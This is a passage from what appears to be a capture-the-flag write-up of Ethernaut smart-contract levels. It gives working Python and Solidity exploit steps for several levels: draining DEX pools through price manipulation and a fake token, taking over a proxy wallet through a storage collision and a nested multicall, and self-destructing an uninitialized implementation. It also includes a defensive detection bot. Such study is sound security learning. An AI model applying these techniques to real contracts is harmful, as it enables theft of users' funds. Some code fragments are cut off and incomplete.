function price() public view returns (uint256) {
    if (shopContract.isSold()) {
        return 1;
    } else {
        return 100;

If isSold is true, the price gets overwritten by a 1, however, in the if statement, we pass the check (requiring price() to return 100) since isSold is still false.

In python:

buyer = Buyer.deploy(shop.address, _from)
  1. Call the buy function in the Shop contract, which the Shop contract expects to see coming from another contract (in this case my Buyer contract).

Block explorer:

  1. Confirm that the price < 100
price_assertion = shop.price() < 100
print(f"The selling price is below 100: {price_assertion}")

Submission transaction

Block explorer:



The goal of this level is for you to hack the basic DEX contract below and steal the funds by price manipulation.


First we have to approve both tokens for transfer, which we can conveniently do with the approve() function in the Dex contract. Then we take advantage of the poor way to compute the price used by the contract.

The ratio used to compute the price of each asset is as follows:

$$getSwapPrice(T_n, T_k, A) = A * \frac{balanceOf(T_n, Dex)}{balanceOf(T_k, Dex)}$$


This ratio computation is severely flawed and can very easily be used to attack the contract. We can see that by simply using the 10 tokens we’re given to perform swaps, the ratio becomes completely unbalanced, as we are simply relying on the available supply on the assets stored in the contract.

To illustrate the imbalance each swap creates, let’s simulate the first 3 scenarios:

First swap



$$T_1 \rightarrow T_2 \approx 10$$

After each swap, the balances will change, as we are putting units of $T_1$ in the pool and taking out units of $T_2$ and vice versa.

Second swap



$$T_2 \rightarrow T_1 \approx 12$$

Here we already see that by putting back the same 10 $T_2$ tokens we put in, we can now take out 12 $T_1$ tokens. This is because the internal price in the pool is now unbalanced.

Third swap



$$T_2 \rightarrow T_1 \approx 12$$

This last swap illustrates that of the total pool balance, we have effectively ‘stolen’ 2% of the $T_1$ balance. Executing the swap several additional times, creates enough asset imbalance so that there’s no longer any assets in one side of the pool. If we continue though, we would drain both liquidity sides.

Balances at each swap

Swap Balance $T_1$ Balance $T_2$ Floor of $getSwapPrice(T_n, T_k, 10)$
0 100 100 10
1 110 90 12
2 98 100 10
3 110 88 12
4 83 110 13
5 110 75 14
6 59 110 18
7 110 15 7
8 0 30 Inf

Even though I used the floor of the price, solidity will still apparently internally use decimals prior to casting to integer. As a result of this, swap 8 will cause the pool to be drained, as $7.\bar{3} * 15 = 110$.

How I did it

  1. First call the approve() function in the Dex contract:
# use the convenient approve method in dex
dex.approve(dex.address, 2*256 - 1, _from)


  1. Then I perform enough swaps until the pool is drained, which I do inside an infinite while loop that breaks when the condition that at least one of the balances of a token in the Dex is drained. The following if-else statement performs each swap, all the swaps except the last one using as the amount my balance of each token per swap (alternates through the boolean c which is used to index this dictionary switch = {True: {1: tk1, 2: tk2}, False: {1: tk2, 2: tk1}}):
# perform action
if (my_bal < dex_bal1(c)):
    dex.swap(switch[c][1], switch[c][2], my_bal, _from)
    dex.swap(switch[c][1], switch[c][2], dex_bal1(c), _from)

# check if we are done
if dex_bal1(c) == 0 or dex_bal2(c) == 0:

Table with the swaps and tx hashes:

Swap Balance $T_1$ Balance $T_2$ Tx hash of each one of the swaps
0 100 100 0xded5a80cd702d0f330f0acdda86248b0622a9c05d59a3fb7d7ef8abd1e2fdc12
1 110 90 0xa1b979e946ea9e75ec484309773d11f9c1dba0e5a7894a421a3fdfb3401a2428
2 98 100 0xdfccc83437533c5a142583426a858f7cdf1bee830548523222f353c86775a31e
3 110 88 0x60703c7c78c142f8ad9e9279b7a4a1478d5d48715220d8775f9dfebe5343b7e1
4 83 110 0xe08e68d42b49de0aecef4df9a94e6fd3ad93389155735a896f347e20e84593df
5 110 75 0x5be83195ec1369e34cc05c7b097e15611ef9e8a8d4a00f8a3e97f829e7ff148c
6 59 110 0x44b5e1ff748c05acdf87128d7b68af188cb76e47a226744568c246e36b352773
7 110 15 0xaf0676991ff5583ac68e13197df00b7e0bfa1796f7769519721c8bff8e72ced8
8 0 30 Pool is drained at this point
  1. Once the loop breaks, I confirm that I have actually drained at least one side of the pool:
# check that we have effectively drained at least one of the tokens
balance_assertion = (dex_bal1(True) == 0) or (dex_bal2(True) == 0)
print(f"Token1 balance: {dex_bal1(True)}")
print(f"Token2 balance: {dex_bal2(True)}")
print(f"at least one side is drained: {balance_assertion}")

Submission transaction

Block explorer:

Dex Two


You need to drain all balances of token1 and token2 from the DexTwo contract to succeed in this level.


The DexTwo problem suffers from a different problem to the Dex problem. In this case, there is no require statement checking whether the two token contract addresses being swapped actually match the two token contract addresses for which the pool is designed. As correctly defined in the Dex contract, this line is missing:

require((from == token1 && to == token2) || (from == token2 && to == token1), "Invalid tokens");

As a result of this, we can code another ERC20 token contract of which we mint the entire supply to our wallet and with just a few of these we can drain both sides of the pool as follows:

  1. Create a new ERC20 token and mint the entire supply to our wallet. As defined in the SwappableTokenTwo contract or otherwise.

  2. Send a few of those tokens to the DexTwo contract.

  3. Approve the DexTwo contract for spending our new token.

  4. Transfer some of the new tokens to the contract, so that the contract can compute the internal ratio in it of the tokens using the same flawed getSwapAmount() function.

  5. Perform 2 swaps, one to drain the balance of Token 1 and another one to drain the balance of Token 2 by swapping of our Token 3 (the new token) for them.

  6. Because we can control the internal ratio and we can perform swaps with zero checks of whether the address is the correct one or not, the pool can be easily drained.

How I did it

Exactly as described in solution.

  1. Code and deploy a new ERC20 token (at: 0xc27a45c6D84F6AB7aAFECFB82d0853064e288261)
dextwoattack = DexTwoAttack.deploy('token3', 'TK3', '10000000000000', _from)
  1. Approve the DexTwo contract spending limit for our new token
dextwoattack.approve(dextwo.address, 2**256 - 1, _from)

Block explorer:

  1. Transfer some of the new tokens to the DexTwo contract
dextwoattack.transfer(dextwo.address, 10, _from)

Block explorer:

  1. Perform both swaps, one to drain the balance of Token 1 and the other one to drain the balance of Token 2

Block explorer:

Block explorer:

  1. Check whether we have successfully drained the pools or not
# check the balances
balanceTK1 = dextwo.balanceOf(tk1, dextwo.address)
balanceTK2 = dextwo.balanceOf(tk2, dextwo.address)
print(f"The pool balances are: TK1: {balanceTK1}, TK2: {balanceTK2}")

# the pools have been drained
balance_assertion = balanceTK1 == 0 and balanceTK2 == 0
print(f"The pools have been drained: {balance_assertion}")

Submission transaction

Block explorer:



You’ll need to hijack this wallet to become the admin of the proxy.


The state variable layout of the PuzzleProxy contract and the PuzzleWallet contract is as follows:

Storage slot PuzzleProxy PuzzleWallet
0 pendingAdmin owner
1 admin maxBalance

But as we know from the utility of proxies, the objective of proxies is to contain storage to allow contract implementations (logic contract) to be upgraded without having to replace contract storage in every upgrade. There’s a problem with this storage layout, as there’s state variables that some functions in PuzzleWallet modify like setMaxBalance(), the variables that PuzzleWallet will end up modifying through delegatecalls are the variables in PuzzleProxy.

If the developers intended PuzzleWallet variables like owner and maxBalance to have their own slot, they should have replicated the same storage layout in PuzzleProxy first and then add any additional variables in order to avoid storage collisions.

Therefore, we can follow these steps to become admin:

  1. Call proposeNewAdmin() on PuzzleProxy passing your address as _newAdmin in order to become owner, as owner is also pendingAdmin because of the storage collision

All subsequent steps past this point must be done through he proxy contract’s fallback function which passes all calls to the PuzzleWallet contract using delegatecall. To do this, just perform a normal transaction with some encoded data pertaining to the function calls and inputs.

  1. Become whitelisted by calling addToWhitelist() passing your address as addr in order to pass the onlyWhitelisted modifier check.

  2. Create a transaction data bundle in order to call multicall(). The bundle should consist of two deposit transactions. However, the code doesn’t allow for this, instead, the bundle should consist of a multicall bundle with the tx data for a deposit() call and a multicall() containing a deposit() call. Because the transaction is nested, this second multicall() that calls deposit() will not detect that we are calling deposit twice in a row.

  3. Because we called deposit() twice but our tx value in that single tx was 0.001 ether, even though you only deposit 0.001 ether once, it still sums 0.001 ether twice to your address’ balance in the balance mapping.

  4. Now that your balance in the balance mapping is of 0.002 ether, you’re able to withdraw the entire contract balance. To do so, call execute() with the entire contract balance in the value parameter of the function.

  5. After draining the contract, you can now call setMaxBalance() by passing in your address casted as an integer, which will make maxBalance and therefore admin your address.

How I did it

As described in solution, but with a few resourceful changes in order to simplify the python code.

  1. Get the position in the proxy contract’s storage which contains the address of the implementation contract. I do this in order to be able to encode the calls to certain methods in this contract, which I could technically do manually by constructing a short JSON and encoding it as ABI, but using the contract code instance is easier. I think it’s also possible to deploy an instance of the PuzzleWallet contract in order to do it.
storage_position_impl_address = hex(int(web3.sha3(text='eip1967.proxy.implementation').hex(),16)-1)
implementation_address = f'0x{web3.eth.get_storage_at(puzzleproxy.address, storage_position_impl_address).hex()[-40:]}'
  1. Get the PuzzleWallet contract instance and assign it to an object in python in order to encode the contract calls that will be passed to the proxy contract through the tx data.
puzzlewallet =
  1. Call proposeNewAdmin() to become pendingAdmin
puzzleproxy.proposeNewAdmin(acc.address, _from)

Block explorer:

Every single step after this one will perform a tx that sends tx data to the proxy contract in order to perform the delegate calls to the PuzzleWallet contract.

  1. Call the addToWhitelist() function in order to whitelist my address
whitelist_address_data = puzzlewallet.addToWhitelist.encode_input(acc.address)
acc.transfer(to=puzzleproxy.address, amount=0, data=whitelist_address_data)

Block explorer:

  1. Create the multicall bundled transaction and call multicall() as specified in solution step 3.
# multicall tx data
deposit_data = puzzlewallet.deposit.encode_input()
multicall_data = puzzlewallet.multicall.encode_input([deposit_data])
# nest the call
multicall_data = puzzlewallet.multicall.encode_input([deposit_data, multicall_data]) 
acc.transfer(to=puzzleproxy.address, amount=puzzleproxy.balance(), data=multicall_data)

Block explorer:

  1. Perform the withdrawal of all contract’s funds by calling execute().
execute_data = puzzlewallet.execute.encode_input(acc.address, puzzleproxy.balance(), "")
acc.transfer(to=puzzleproxy.address, amount=0, data=execute_data)

Block explorer:

  1. Call setMaxBalance() in order to become admin
max_balance_data = puzzlewallet.setMaxBalance.encode_input(int(acc.address, 16))
acc.transfer(to=puzzleproxy.address, amount=0, data=max_balance_data)

Block explorer:

  1. Check if I’m admin
# check if my address is the admin address
admin_assertion = puzzleproxy.admin() == acc.address
print(f'The admin of the contract is {acc.address}, therefore my address is admin: {admin_assertion}')

Submission transaction

Block explorer:



Would you be able to selfdestruct its engine and make the motorbike unusable ?


The Engine contract inherits from Initializable, which means the initializer function is restricted to be called once. However, because the Engine is the implementation and Motorbike is the proxy, the initializer modifier doesn’t restrict EOAs or other contracts from calling the initialize() function and through upgradeToAndCall() effectively passing any call to the implementation. The call is passed through the _upgradeToAndCall() function in a delegatecall, this way we just deploy a malicious contract with selfdestruct() call in a function and call this function as if the caller was the engine contract.

The steps to reproduce it are simple:

  1. Get the address of the Engine implementation, as defined in Motorbike identical to how they’re usually defined in an Upgradeable Proxy contract

  2. Call the initialize() function to become upgrader and be able to pass calls to the _authorizeUpgrade() function

  3. Deploy a malicious contract with a single function that can self destruct the contract.

  4. Call the function that would normally self destructs the malicious contract through a delegatecall in upgradeToAndCall() in the Engine contract by passing in the malicious contract address as newImplementation and the data that would call the function as data. After this, the Engine implementation contract will be destroyed.

How I did it

  1. Find the implementation address of the Engine contract
# find engine contract implementation
storage_position_impl_address = hex(int(web3.sha3(text='eip1967.proxy.implementation').hex(),16)-1)
implementation_address = f'0x{web3.eth.get_storage_at(motorbike.address, storage_position_impl_address).hex()[-40:]}'

# load Engine contract
eg =
  1. Call initialize() in the Engine contract
# initialize the engine implementation

Block explorer:

  1. Deploy a BombEngine contract (at: 0x89a05702875f0c18FF5B28640ea3DdE39FDe6E47) with only a single function that can self destruct such contract
function boom() public {
# deploy our bomb engine contract
be = BombEngine.deploy(_from)
  1. Call UpgradeToAndCall() in the Engine implementation contract as described in solution.
# call upgradeToAndCall() to selfdestruct the Engine implementation contract
selfdestruct_call = be.boom.encode_input()
eg.upgradeToAndCall(be.address, selfdestruct_call, _from)

Block explorer:

  1. Confirm that the contract has been successfully destroyed by checking if we can call the getter function for one of the state variables, in this case upgrader()
    # call the getter function

    # print if it didnt fail
    print('The contract was not successfully self destructed')

    # return that it failed
    return False
    # print if it failed
    print('The contract was successfully self destructed')
    # return that it succeeded
    return True

Submission transaction

Block explorer:



Your job is to implement a detection bot and register it in the Forta contract. The bot’s implementation will need to raise correct alerts to prevent potential attacks or bug exploits.


The vulnerability in the CryptoVault contract is present in the sweepToken() function. There’s two ways we can sweep the DoubleEntryPoint tokens:

  1. By calling sweepToken() and passing the DoubleEntryPoint token contract address

  2. By calling sweepToken() and passing the LegacyToken token contract address

There’s a require statement in the function which compares if this token contract address is the underlying token contract address defined (or modified) by the setUnderlying() function (which we can’t call because the underlying token contract address is not the null address) is the DoubleEntryPoint token contract address, however, it does NOT check if it’s the LegacyToken token contract address.

When we pass the LegacyToken token contract address, the LegacyToken contract will receive the transfer call and instead delegate this transfer to the DoubleEntryPoint token contract, which will result in these tokens moving when sweepToken() is called.

As we can see in the DoubleEntryPoint token contract, we have the ability to use the Forta contract to create a detection bot, essentially, another contract that will trigger an alert when an otherwise unexpected event occurs.

To protect against the CryptoVault vulnerability, we have create a detection bot contract which checks whether the CryptoVault contract is the one attempting to transfer the tokens out of the contract. If the CryptoVault address is found in the calldata of that function call, then we prevent the contract from transferring the tokens and revert the transaction by raising the alert. If the alert counter increases, then the transaction is reverted.

To do this we can either pull the data directly from the calldata by knowing where the origSender address (parameter of the delegateTransfer() function in the DoubleEntryPoint token contract) is within that calldata, so essentially what its offset is. This can be deducted by knowing how calldata is layed out. Once we know the offset, we can pull the data from that offset and compare it to the CryptoVault address. If origSender is the CryptoVault address, we raise the alert.

Alternatively, we can go byte by byte within that calldata until we find the offset where origSender is located and compare it with the CryptoVault address. Once the loop reaches this point and we successfully make the comparison, then the transaction will either continue (if origSender is not the CryptoVault address) or be reverted (if origSender is the CryptoVault address).

How I did it

  1. Get the CryptoVault contract address from the DoubleEntryPoint cryptoVault state variable.
# get cryptovault address
cryptovault_address = dep.cryptoVault()
  1. Instantiate the CryptoVault contract. I do this to later call sweepToken() in order to test my detection bot
cryptovault =
  1. Get the Forta contract address and instantiate the Forta contract to later call setDetectionBot()
forta =
  1. Code and deploy (at: 0xA662bD0c21450a80c5B3fCA07709771Eb720EcB6) DetectionBot contract that raises an alert if the CryptoVault address is found in the calldata when sweepToken() is called. I decided to code this using a loop which goes over every offset of the calldata (up until a max of the total size of the calldata in bytes, in this case 228 bytes). I recognize this is less efficient than simply figuring out where origSender is in the calldata, but I wanted to try solving the problem how I would otherwise do it in a different programming language that I’m more familiar with. This is a sort of ‘bruteforce’ type way to find it, but for the time being, I’m okay with that.

That said, I coded the handleTransaction() function as follows:

function handleTransaction(address user, bytes calldata) public override {
    uint dataValue;
    uint calldataloadPos = 4;
    uint _calldatasize;

    // get calldata size (in bytes) so the loop ends where the data ends
    assembly {
        _calldatasize := calldatasize()

    while (calldataloadPos < _calldatasize) {
        // obtain the next 32-byte item from the calldata
        assembly {
            dataValue := calldataload(calldataloadPos)

        // check if the address is present in the next 32 byte slot
        if (dataValue == uint256(uint160(cryptoVault))) {
            // raise alert if address is present in calldata

        } else {
            // add one to calldataloadpos
            assembly {
                calldataloadPos := add(calldataloadPos, 0x1)

The deployment is done in python as follows:

bot = DetectionBot.deploy(cryptovault_address, forta.address, _from)
  1. Set the detection bot calling setDetectionBot() in the forta contract with the bot contract address
forta.setDetectionBot(bot.address, _from)
  1. Get the LegacyToken token contract address to later pass it as a parameter to sweepToken() in CryptoVault
# get the legacy token contract address
legacytoken = dep.delegatedFrom()
  1. Try sweeping the tokens while allowing the transaction to revert
cryptovault.sweepToken(legacytoken, _from | {'allow_revert':True})
  1. Check if the revert message is the correct one (meaning the alert was triggered)
revert_msg_assertion = history[-1].revert_msg == 'Alert has been triggered, reverting'
print(f"The transaction triggered the forta alert: {revert_msg_assertion}")

Submission transaction

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